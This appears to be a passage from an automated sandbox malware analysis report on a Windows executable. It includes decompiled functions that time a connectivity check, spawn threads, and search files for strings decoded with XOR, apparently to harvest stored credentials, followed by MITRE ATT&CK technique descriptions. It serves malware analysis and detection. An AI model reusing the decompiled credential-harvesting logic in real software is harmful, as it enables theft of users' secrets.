Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: getpeernamegetsockname
String ID: BAA
API String ID: 2691512538-1692831742
Opcode ID: 627a6f461b8cdcb368e07ad735daf8e55cba88348361bfe94107fefa3199f565
Instruction ID: f61e330934a4539e64815c77ffe9ec5361f293376b7fbb3bdf640de5d8019891
Opcode Fuzzy Hash: 627a6f461b8cdcb368e07ad735daf8e55cba88348361bfe94107fefa3199f565
Instruction Fuzzy Hash: C90188B5D0024DAADF00CFA4C8447EE7BF4AF05314F008166E862F62D1D7789A55DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00408F4E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408F4E(intOrPtr __eax, void* __eflags) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				char* _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				void* __edi;
				intOrPtr _t26;

				_t26 = 0;
				_v56 = 0x101;
				_v52 = 0;
				_v48 = __eax;
				_v44 = E00408ECD();
				_v40 = "http://www.google.com/webhp";
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0x80000;
				_v12 = 0;
				_v8 = GetTickCount();
				if(E00408D9B( &_v56, 0) != 0) {
					_t26 = GetTickCount() - _v8;
				}
				E00406E85(_v44);
				return _t26;
			}

0x00408f56
0x00408f59
0x00408f5f
0x00408f62
0x00408f70
0x00408f73
0x00408f7a
0x00408f7d
0x00408f80
0x00408f83
0x00408f86
0x00408f89
0x00408f90
0x00408f99
0x00408fa3
0x00408fa9
0x00408fa9
0x00408faf
0x00408fba

APIs

Part of subcall function 00408ECD: LoadLibraryA.KERNEL32(urlmon.dll,00000000), ref: 00408EDE
Part of subcall function 00408ECD: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00408EF1
Part of subcall function 00408ECD: FreeLibrary.KERNEL32(?), ref: 00408F43

GetTickCount.KERNEL32 ref: 00408F93

Part of subcall function 00408D9B: WaitForSingleObject.KERNEL32(?,?,?,?,00000000), ref: 00408DEF
Part of subcall function 00408D9B: InternetCloseHandle.WININET(00000000), ref: 00408E88

GetTickCount.KERNEL32 ref: 00408FA5

Strings

http://www.google.com/webhp, xrefs: 00408F73

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CountLibraryTick$AddressCloseFreeHandleInternetLoadObjectProcSingleWait
String ID: http://www.google.com/webhp
API String ID: 2673491915-2670330958
Opcode ID: bc0e934ddc56b4dc5606155300f98fe67b626741d739b96fef687cb00b4936a5
Instruction ID: 1a69adfa867b738e4cbe6527632920714cd91ecdb092cb3a4ef06f34a26a0793
Opcode Fuzzy Hash: bc0e934ddc56b4dc5606155300f98fe67b626741d739b96fef687cb00b4936a5
Instruction Fuzzy Hash: 9B01E8B1D112289ACF00DFE9D9444DEFBB8BF48758F10456BE940B3250D7B95A058BD8

Uniqueness

Uniqueness Score: -1.00%

Function 0040AF41, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AF41(signed char* __esi, long _a4, _Unknown_base(*)()* _a8, char _a12) {
				void* _t9;

				if( *__esi < 0x40) {
					if(_a8 == 0) {
						L6:
						return 1;
					}
					_t2 =  &_a12; // 0x423860
					_t9 = CreateThread(0, _a4, _a8,  *_t2, 0, 0);
					if(_t9 == 0) {
						L2:
						return 0;
					}
					__esi[4 + ( *__esi & 0x000000ff) * 4] = _t9;
					 *__esi =  *__esi + 1;
					goto L6;
				}
				SetLastError(0x9b);
				goto L2;
			}

0x0040af44
0x0040af5a
0x0040af81
0x00000000
0x0040af81
0x0040af60
0x0040af6e
0x0040af76
0x0040af51
0x00000000
0x0040af51
0x0040af7b
0x0040af7f
0x00000000
0x0040af7f
0x0040af4b
0x00000000

APIs

SetLastError.KERNEL32(0000009B,004157D2,00000000,00415670,00000000,00423860,00000000,0041348A,00423860,00000000,00000104,74B5F560,00000000), ref: 0040AF4B
CreateThread.KERNEL32 ref: 0040AF6E

Strings

`8B, xrefs: 0040AF60

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateErrorLastThread
String ID: `8B
API String ID: 1689873465-953912949
Opcode ID: 26016d5e18915806e2dc301fd77dc21ebf6ed6cc4e18a2796d6357e1653bc88c
Instruction ID: 448d3ac3a92d084e3e9f0d8064f43f3addb4d9012edd484dd78cd3599ff34ea2
Opcode Fuzzy Hash: 26016d5e18915806e2dc301fd77dc21ebf6ed6cc4e18a2796d6357e1653bc88c
Instruction Fuzzy Hash: BDE0D8B0108342AADB215F709E09B2ABFD1AF4DB01F10486DF3C5361E1C2798065DB2F

Uniqueness

Uniqueness Score: -1.00%

Function 0041933A, Relevance: 5.2, APIs: 4, Instructions: 197
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041933A(void* __ecx, signed char* __edx, void* __eflags, intOrPtr _a4) {
				char _v524;
				char _v576;
				char _v580;
				char _v588;
				intOrPtr _v608;
				char _v612;
				char _v620;
				char _v628;
				char _v632;
				char* _v640;
				signed int _v644;
				char* _v648;
				char** _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				char* _v664;
				char* _v668;
				char* _v672;
				char* _v676;
				void* __edi;
				void* __esi;
				signed int _t82;
				char* _t83;
				intOrPtr _t85;
				char** _t101;
				char* _t112;
				char* _t121;
				char* _t122;
				void* _t123;
				char* _t126;
				char* _t127;
				char* _t156;
				void* _t157;
				signed int _t166;
				char* _t167;
				char** _t168;
				intOrPtr _t170;
				char* _t171;
				signed int _t172;
				void* _t174;

				_t174 = (_t172 & 0xfffffff8) - 0x294;
				if(E0040C70A( &(__edx[0x2c]),  &_v524, __ecx) == 0) {
					L31:
					return 1;
				}
				_t177 =  *__edx & 0x00000010;
				if(( *__edx & 0x00000010) == 0) {
					_push( &_v524);
					_t82 = 2;
					_t83 = E0040C09A(_t82,  &_v524,  &_v612);
					__eflags = _t83;
					if(_t83 == 0) {
						goto L31;
					}
					_t85 = E00407720(_v608,  &_v652, _v612, 1, 0);
					_v660 = _t85;
					__eflags = _t85 - 0xffffffff;
					if(_t85 == 0xffffffff) {
						L30:
						E0040C142( &_v612);
						goto L31;
					}
					_v640 = E00406E55(0x622);
					E00405ACA(0x91,  &_v588);
					E00405ACA(0x92,  &_v628);
					E00405ACA(0x93,  &_v620);
					E00405ACA(0x94,  &_v576);
					__eflags = _v640;
					if(_v640 == 0) {
						L29:
						E00406E85(_v640);
						E00406EA1(_v652, _v656);
						goto L30;
					}
					_v644 = 0;
					__eflags = _v648;
					if(_v648 > 0) {
						do {
							_t166 = _v644;
							_t101 = _v652;
							__eflags =  *(_t101 + _t166 * 4);
							if( *(_t101 + _t166 * 4) == 0) {
								goto L28;
							}
							_v664 = StrStrIA( *(_t101 + _t166 * 4),  &_v588);
							_t156 = StrStrIA( *(_v656 + _t166 * 4),  &_v632);
							_v668 = StrStrIA( *(_v660 + _t166 * 4),  &_v628);
							_t112 = StrStrIA( *(_v664 + _t166 * 4),  &_v588);
							__eflags = _v676;
							_t167 = _t112;
							if(_v676 == 0) {
								goto L28;
							}
							__eflags = _v672;
							if(_v672 == 0) {
								goto L28;
							}
							__eflags = _t167;
							if(_t167 == 0) {
								goto L28;
							}
							_v676 =  &(_v676[8]);
							_v672 =  &(_v672[6]);
							_t168 =  &(_t167[0xa]);
							_v652 = _t168;
							E00419320();
							E00419320();
							E00419320();
							__eflags = _t156;
							if(_t156 == 0) {
								L15:
								_t157 = 0x15;
								L16:
								__eflags =  *_v676;
								if( *_v676 == 0) {
									goto L28;
								}
								__eflags =  *_v672;
								if( *_v672 == 0) {
									goto L28;
								}
								_t121 =  *_t168;
								__eflags = _t121;
								if(_t121 == 0) {
									goto L28;
								}
								__eflags = _t121 - 0x30;
								if(_t121 == 0x30) {
									L21:
									__eflags = _t168[0];
									if(_t168[0] == 0) {
										goto L28;
									}
									L22:
									_t122 = 0;
									__eflags =  *_t168;
									if( *_t168 == 0) {
										goto L28;
									} else {
										goto L23;
									}
									do {
										L23:
										_t122[_t168] = _t122[_t168] ^ 0x00000019;
										_t122 =  &(_t122[1]);
										__eflags = _t122[_t168];
									} while (_t122[_t168] != 0);
									__eflags = _t122;
									if(_t122 > 0) {
										_t169 =  &_v580;
										_t123 = 0x57;
										E00405B00(_t123,  &_v580);
										_push(_t157);
										_push(_v676);
										_t158 = _v656;
										_push(_v652);
										_push(_v672);
										_t126 = E00407B78(_t169, 0x311, _v656, _t169);
										_t174 = _t174 + 0x14;
										__eflags = _t126;
										if(_t126 > 0) {
											_t170 = _a4;
											_t127 = E00407279(_t126, _t170, _t158);
											__eflags = _t127;
											if(_t127 != 0) {
												_t68 = _t170 + 4;
												 *_t68 =  &(( *(_t170 + 4))[1]);
												__eflags =  *_t68;
											}
										}
									}
									goto L28;
								}
								__eflags = _t121 - 0x31;
								if(_t121 != 0x31) {
									goto L22;
								}
								goto L21;
							}
							_v648 =  &(_t156[6]);
							E00419320();
							_t157 = E00407504(_v648,  &_v588, 0);
							__eflags = _t157 - 1;
							if(_t157 < 1) {
								goto L15;
							}
							__eflags = _t157 - 0xffff;
							if(_t157 <= 0xffff) {
								goto L16;
							}
							goto L15;
							L28:
							_v644 = _v644 + 1;
							__eflags = _v644 - _v648;
						} while (_v644 < _v648);
					}
					goto L29;
				} else {
					_t171 =  &_v612;
					E00405B00(0x90, _t171);
					_v648 = _t171;
					E0040C5AE( &_v524,  &_v648, _t177, 1, 5, E0041933A, _a4, 0, 0, 0);
					goto L31;
				}
			}

0x00419340
0x0041935e
0x004195be
0x004195c6
0x004195c6
0x00419364
0x00419367
0x004193aa
0x004193ad
0x004193b2
0x004193b7
0x004193b9
0x00000000
0x00000000
0x004193d0
0x004193d5
0x004193d9
0x004193dc
0x004195b5
0x004195b9
0x00000000
0x004195b9
0x004193ec
0x004193f9
0x00419407
0x00419415
0x00419423
0x00419428
0x0041942c
0x0041959f
0x004195a3
0x004195b0
0x00000000
0x004195b0
0x00419432
0x00419436
0x0041943a
0x00419446
0x00419446
0x0041944a
0x0041944e
0x00419452
0x00000000
0x00000000
0x00419462
0x00419474
0x00419484
0x00419494
0x00419496
0x0041949b
0x0041949d
0x00000000
0x00000000
0x004194a3
0x004194a8
0x00000000
0x00000000
0x004194ae
0x004194b0
0x00000000
0x00000000
0x004194b6
0x004194bf
0x004194c4
0x004194c7
0x004194cb
0x004194d4
0x004194db
0x004194e0
0x004194e2
0x0041950c
0x0041950e
0x0041950f
0x00419513
0x00419516
0x00000000
0x00000000
0x0041951c
0x0041951f
0x00000000
0x00000000
0x00419521
0x00419523
0x00419525
0x00000000
0x00000000
0x00419527
0x00419529
0x0041952f
0x0041952f
0x00419533
0x00000000
0x00000000
0x00419535
0x00419535
0x00419537
0x00419539
0x00000000
0x00000000
0x00000000
0x00000000
0x0041953b
0x0041953b
0x0041953b
0x0041953f
0x00419540
0x00419540
0x00419546
0x00419548
0x0041954c
0x00419550
0x00419551
0x00419556
0x00419557
0x0041955b
0x0041955f
0x00419565
0x0041956f
0x00419574
0x00419577
0x00419579
0x0041957b
0x00419581
0x00419586
0x00419588
0x0041958a
0x0041958a
0x0041958a
0x0041958a
0x00419588
0x00419579
0x00000000
0x00419548
0x0041952b
0x0041952d
0x00000000
0x00000000
0x00000000
0x0041952d
0x004194e9
0x004194ed
0x004194fd
0x004194ff
0x00419502
0x00000000
0x00000000
0x00419504
0x0041950a
0x00000000
0x00000000
0x00000000
0x0041958d
0x0041958d
0x00419595
0x00419595
0x00419446
0x00000000
0x00419369
0x00419369
0x00419372
0x00419379
0x00419399
0x00000000
0x00419399

APIs

Part of subcall function 0040C70A: PathCombineW.SHLWAPI(?,)A,?,00412909,?,?), ref: 0040C729

StrStrIA.SHLWAPI(?,?,?,?), ref: 00419460
StrStrIA.SHLWAPI(?,?), ref: 00419472
StrStrIA.SHLWAPI(?,?), ref: 00419482
StrStrIA.SHLWAPI(?,?), ref: 00419494

Part of subcall function 0040C5AE: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040C5ED
Part of subcall function 0040C5AE: WaitForSingleObject.KERNEL32(00000000,00000000,?,?,?,00000000), ref: 0040C614
Part of subcall function 0040C5AE: PathMatchSpecW.SHLWAPI(?,?,?,?,?,00000000), ref: 0040C65E
Part of subcall function 0040C5AE: Sleep.KERNEL32(00000000,?,?), ref: 0040C6BB
Part of subcall function 0040C5AE: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0040C6E9
Part of subcall function 0040C5AE: FindClose.KERNEL32(?,?,?,?,00000000), ref: 0040C6FB

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$FilePath$CloseCombineFirstMatchNextObjectSingleSleepSpecWait
String ID:
API String ID: 1075381090-0
Opcode ID: 7ac468dbb1a69375882c11ac944966693f8c9b80e384dd0b661a841a40fe8adf
Instruction ID: 3842fac5284648828184a3c8fac80a944414852b35db22dfa5ded6b40b6195cf
Opcode Fuzzy Hash: 7ac468dbb1a69375882c11ac944966693f8c9b80e384dd0b661a841a40fe8adf
Instruction Fuzzy Hash: BF71C472508341AFD721DF25C851B9FB7E6AF84304F44092EF895A7291C738ED86CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00405B4A, Relevance: 5.1, APIs: 4, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405B4A(intOrPtr _a4) {
				intOrPtr _v8;
				void* __esi;
				void* _t13;
				signed int _t19;
				signed short _t26;
				signed int _t30;
				void* _t37;

				_t37 = E004079D4(_a4);
				if(_t37 > 0x3e8) {
					EnterCriticalSection(0x4223b8);
					E00406E85( *0x4223ac);
					 *0x4223ac =  *0x4223ac & 0x00000000;
					 *0x4223b4 = 0;
					LeaveCriticalSection(0x4223b8);
					return 0;
				}
				EnterCriticalSection(0x4223b8);
				_t26 = ( *0x4223b4 & 0x0000ffff) + _t37;
				if(_t26 <= 0x3e8) {
					_t13 = E00406E10(_t26 + _t26, 0x4223ac);
					if(_t13 != 0) {
						_t30 =  *0x4223ac; // 0x0
						_t13 = E00406EC1(_t30 + ( *0x4223b4 & 0x0000ffff) * 2, _a4, _t37 + _t37);
						 *0x4223b4 = _t26;
					}
				} else {
					_t13 = E00406E10(0x7d0, 0x4223ac);
					if(_t13 != 0) {
						_t18 = 0x3e8 - _t37;
						_t19 =  *0x4223ac; // 0x0
						E00406EC1(_t19, _t19 + (( *0x4223b4 & 0x0000ffff) - 0x3e8 - _t37) * 2, 0x3e8 - _t37 + _t18);
						_t13 = E00406EC1(0x3e8 - _t37 + _t18 +  *0x4223ac, _v8, _t37 + _t37);
						 *0x4223b4 = 0x3e8;
					}
				}
				LeaveCriticalSection(0x4223b8);
				return _t13;
			}

0x00405b56
0x00405b5f
0x00405b67
0x00405b73
0x00405b78
0x00405b82
0x00405b88
0x00000000
0x00405b88
0x00405b99
0x00405ba6
0x00405baf
0x00405bff
0x00405c06
0x00405c08
0x00405c21
0x00405c26
0x00405c26
0x00405bb1
0x00405bb6
0x00405bbd
0x00405bc8
0x00405bcf
0x00405bda
0x00405bee
0x00405bf3
0x00405bf3
0x00405bbd
0x00405c32
0x00000000

APIs

EnterCriticalSection.KERNEL32(004223B8,?,?,?,00405E3D,?), ref: 00405B67

Part of subcall function 00406E85: HeapFree.KERNEL32(00000000,00000000,0040867C,00000000,?,?,?,004127CC,00000000,00412CA6), ref: 00406E98

LeaveCriticalSection.KERNEL32(004223B8,?,?,?,00405E3D,?), ref: 00405B88
EnterCriticalSection.KERNEL32(004223B8,?,?,?,?,00405E3D,?), ref: 00405B99
LeaveCriticalSection.KERNEL32(004223B8,?,?,?,00405E3D,?), ref: 00405C32

Memory Dump Source

Source File: 00000000.00000002.203352593.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.203349037.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.203370828.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.203374404.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLeave$FreeHeap
String ID:
API String ID: 1946732658-0
Opcode ID: f305d5ba9391eed4c34a6e81c576921ba9f6cd932b350051a0bc092bee24c33e
Instruction ID: befded29e7ebc60eb341f187559da6e9fc6c1e70589ca037fc3e61ca885b50e6
Opcode Fuzzy Hash: f305d5ba9391eed4c34a6e81c576921ba9f6cd932b350051a0bc092bee24c33e
Instruction Fuzzy Hash: 4421CF31204214BFC720EFB4EE84A7A33A9EB90315740043FF902A61B1EABC5816CB9C

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create an account to maintain access to victim systems. With a sufficient level of access, creating such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
Tactics:	Persistence
Data Sources:	AWS CloudTrail logs, Authentication logs, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate. Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Digital certificate logs, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report eUTopTYPuc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Protection of GUI:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

System Behavior

Analysis Process: eUTopTYPuc.exe PID: 632 Parent PID: 5732

General

Chronological Activities

Disassembly

Code Analysis

Analysis Process: eUTopTYPuc.exe PID: 632 Parent PID: 5732 eUTopTYPuc.exeCOMMON

Executed Functions

Function 00412A7D, Relevance: 40.5, APIs: 15, Strings: 8, Instructions: 229
libraryloadermemoryCOMMON

Function 0040A474, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 57
COMMON

